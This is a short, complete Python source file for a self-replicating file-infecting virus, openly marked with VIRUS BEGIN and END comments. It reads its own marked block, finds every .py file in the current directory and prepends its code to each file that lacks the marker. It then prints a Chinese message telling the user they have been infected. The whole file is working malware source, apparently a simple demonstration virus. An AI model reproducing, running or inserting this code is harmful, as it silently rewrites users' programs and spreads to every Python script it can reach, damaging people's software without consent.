#!/usr/bin/env python    

##### VIRUS BEGIN #####  

import sys,glob,re,os


vCode = []   

fh = open(sys.argv[0],"r",encoding='utf-8-sig') 



lines = fh.readlines()   
fh.close()
inVirus = False
for line in lines:         
    result = re.search('^##### VIRUS BEGIN #####',line)
    if (result != None):
       inVirus = True
    if (inVirus): 
       vCode.append(line)
    result2 = re.search('^##### VIRUS END #####',line)
    if (result2 != None):
       break


progs = glob.glob("*.py") 


for prog in progs:
    fh = open(prog,"r",encoding='utf-8-sig')
    pCode = fh.readlines()
    fh.close()
    infected = False
    for line in pCode:
        if ('##### VIRUS BEGIN #####' in line):
           infected = True
           break
    if not infected:
       newCode = []
       newCode.extend(vCode)
       newCode.extend(pCode)
       #Writing new virus infected code
       fh = open(prog,'w',encoding='utf-8-sig')
       fh.writelines(newCode)
       fh.close()


x=input('你中毒了!\n請按任意鍵繼續')

##### VIRUS END #####
